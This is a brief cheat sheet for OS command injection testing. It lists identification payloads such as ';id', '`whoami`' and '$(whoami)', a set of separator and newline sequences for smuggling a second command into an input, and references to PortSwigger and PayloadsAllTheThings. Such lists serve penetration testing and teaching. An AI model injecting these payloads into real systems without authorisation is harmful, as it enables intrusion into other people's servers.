OS Command Injection
cheat sheet
Identification
;id
;id;
;id|
|id
| ls /
& whoami
`whoami`
$(whoami)
Initial sequence
Follow the initial sequence with your OS command payload.
&
&&
|
||
;
"
";
'"
';
%0a
%0d%0a
\0
\n
\r
*;
References
https://portswigger.net/web-security/os-command-injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection